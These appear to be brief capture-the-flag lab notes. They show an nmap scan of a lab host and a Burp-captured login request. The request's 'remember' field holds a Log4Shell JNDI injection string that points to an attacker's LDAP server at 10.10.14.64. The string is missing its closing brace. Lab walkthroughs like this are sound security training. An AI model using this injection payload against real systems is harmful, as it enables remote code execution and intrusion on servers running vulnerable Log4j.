┌──(root㉿kali)-[~]
└─#  nmap 10.129.201.127 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-27 10:43 EDT
Nmap scan report for 10.129.201.127
Host is up (0.074s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
6789/tcp open  ibm-db2-admin
8080/tcp open  http-proxy
8443/tcp open  https-alt

https://10.129.201.127:8443/manage/account/login?redirect=%2Fmanage

burp >>

POST /api/login HTTP/1.1

{"username":"admin","password":"pass","remember":"${jndi:ldap://10.10.14.64/whatever","strict":true}